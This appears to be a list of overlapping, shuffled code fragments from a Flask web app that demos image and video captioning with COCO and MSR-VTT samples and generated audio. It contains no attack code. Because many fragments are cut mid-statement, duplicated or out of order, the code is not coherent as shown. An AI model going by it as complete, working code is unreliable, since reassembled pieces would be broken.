"by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions })",
"@app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact')",
"if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return 'image' def",
"if by_scene: return 'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption",
"= request.files['file'] by_scene = 'by_scene' in request.form # Check if filetype is allowed",
"using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x,",
"for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for x",
"app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids if x not in",
"video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] +",
"filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext in",
"and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url,",
"if file and allowed_file(file.filename): # Fix filename, save to file, get ext and",
"for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample",
"for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) +",
"rand_vid_ids = [x for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)]",
"@app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" #",
"Generate audio files for each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption,",
"each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' +",
"return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace('",
"scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF =",
"+ '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) +",
"beam_size=8) # Get all gt captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id']",
"+ '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene',",
"\"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename):",
"in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[",
"coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using",
"rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids",
"import PIL from flask import render_template, request, redirect, url_for, send_from_directory, session from app",
"imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files",
"samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)):",
"str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image'",
"'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' +",
"+ '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption':",
"app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') #",
"'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) +",
"def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def",
"+ '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] =",
"COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH'])",
"'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][",
"filetype is allowed if file and allowed_file(file.filename): # Fix filename, save to file,",
"import pandas as pd import skimage.io as io import PIL from flask import",
"= pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'],",
"narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR']",
"return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about',",
"in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x]",
"PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR']",
"+ 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt",
"as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] +",
"app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] +",
"and reject any that already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] ==",
"str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix)",
"extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file):",
"any that already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist()",
"+ '.' + str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv',",
"filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and",
"caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file(",
"above -- allows if request.method == 'POST': try: # Grab file, and if",
"demo output page.\"\"\" # Duplicate of above -- allows if request.method == 'POST':",
"return 'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given",
"narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find",
"if it doesn't already exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions",
"def demo(): \"\"\"Render demo page.\"\"\" # Check if file is uploaded if request.method",
"root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from",
"bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() #",
"@app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images():",
"'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") # Get",
"uploaded if request.method == 'POST': try: # Grab file, and if by_scene is",
"= save_file(file) filename, ext = split_filename(file) typ = determine_type(ext, by_scene) if typ ==",
"as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def",
"= pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda",
"filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples directory.\"\"\" return send_from_directory(app.config['SAMPLES_DIR'],",
"+ str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) #",
"update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names",
"file is uploaded if request.method == 'POST': try: # Grab file, and if",
"example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it",
"caption/audio and redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[",
"4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video'",
"'_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def",
"to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files",
"# Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption,",
"url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and",
"file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and generated",
"= gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x,",
"all gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts",
"'.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file(",
"samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT",
"best_score = bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = '",
"str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples",
"@app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos')",
"render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html',",
"if 'video' in x] # Randomly select ids from their respective datasets and",
"caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using vocabulary",
"samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] =",
"+ '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode",
"split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename,",
"[x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for",
"doesn't already exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene",
"for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption",
"vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and",
"caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i)",
"'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if file is uploaded if",
"page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT,",
"+ str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg',",
"[] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.'",
"me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return",
"page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact',",
"@app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST'])",
"from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from",
"is allowed if file and allowed_file(file.filename): # Fix filename, save to file, get",
"im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix)",
"= [[], [], [], []] VID_SAMPLES_DICT = [[], [], [], []] for i,",
"SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE']",
"'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except",
"example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio':",
"'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' +",
"website file = request.files['file'] by_scene = 'by_scene' in request.form # Check if filetype",
"x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = '' best_score = 0.0",
"enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i /",
"page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output",
"Load scene example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time':",
"str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i",
"def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image",
"for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption",
"Randomly select ids from their respective datasets and reject any that already have",
"file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename, ext = split_filename(file) typ",
"'.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4',",
"'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg'",
"# chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x",
"# Determine images and videos to update im_names = [x for x in",
"gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True))",
"the nearest gt nearest_gt = '' best_score = 0.0 for gt in gts:",
"return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext",
"import render_template, request, redirect, url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] +",
"e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\",",
"datasets and reject any that already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set']",
"def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext = file.filename.split('.') if",
"and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH']",
"'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename =",
"+ str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' })",
"' '.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name",
"list): filename = '_'.join(filename) # Replace existing . with _ return filename, ext",
"ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']:",
"of above -- allows if request.method == 'POST': try: # Grab file, and",
"'.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) #",
"[]] for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample =",
"cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids if x",
"app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator",
"KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>')",
"print(\"Samples loaded\") # Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] +",
"scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE'])",
"vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] +",
"cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and",
"narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find",
"samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else: sceneSamplesDF =",
"not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg'",
"Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each",
"pandas as pd import skimage.io as io import PIL from flask import render_template,",
"[x for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids =",
"samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] =",
"# Duplicate of above -- allows if request.method == 'POST': try: # Grab",
"determine_type(ext, by_scene) if typ == 'image': by_scene = False # Generate caption/audio and",
"allows if request.method == 'POST': try: # Grab file, and if by_scene is",
"'_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update samples dataframe samplesDF.loc[name,",
"= gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = '' best_score",
"for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i)",
"# Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene",
"print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and",
"Generate caption/audio by scene and redirect to demo_output # page captions, time_codes =",
"return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return",
"Find nearest gt nearest_gt = '' best_score = 0.0 for gt in gts:",
"time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict']",
"@app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if file is",
"# Grab file, and if by_scene is requested from website file = request.files['file']",
"= narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using vocabulary gts",
"page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\"",
"print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None):",
"filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path",
"# Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] #",
"'POST': try: # Grab file, and if by_scene is requested from website file",
"Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True)",
"'.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR']",
"# Check if filetype is allowed if file and allowed_file(file.filename): # Fix filename,",
"gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to",
"scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact",
"dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt",
"row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ##############################################################################",
"image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video'",
"examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me",
"by scene and redirect to demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[",
"= file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main',",
"/ 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio':",
"from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF =",
"about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo():",
"if typ == 'image': by_scene = False # Generate caption/audio and redirect to",
"and redirect to demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True,",
"# Load scene example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({",
"x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) #",
"render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to",
"save to file, get ext and determine type file.filename = file.filename.replace(' ', '_')",
"narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt = gt gt",
"import skimage.io as io import PIL from flask import render_template, request, redirect, url_for,",
"by_scene = 'by_scene' in request.form # Check if filetype is allowed if file",
"in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE']",
"ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)]",
"if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to",
"cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST'])",
"ids from their respective datasets and reject any that already have been #",
"if bleu > best_score: best_score = bleu nearest_gt = gt gt = '",
"def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def",
"filename into name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename",
"any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets",
"'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' +",
"captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda",
"sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'],",
"vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly",
"by_scene is requested from website file = request.files['file'] by_scene = 'by_scene' in request.form",
"encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode(",
"Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example",
"with _ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\"",
"scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't",
"\"\"\" import os import sys import shutil import pandas as pd import skimage.io",
"redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and redirect to",
"'.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ##############################################################################",
"scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) #",
"str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i) +",
"= gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and",
"typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption,",
"gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts =",
"im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda",
":len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in",
"Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF =",
"'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg',",
"get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def",
"+ 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT =",
"== 'image': by_scene = False # Generate caption/audio and redirect to demo_output page",
"= [x for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] #",
"(name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url =",
"app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt",
"= os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name",
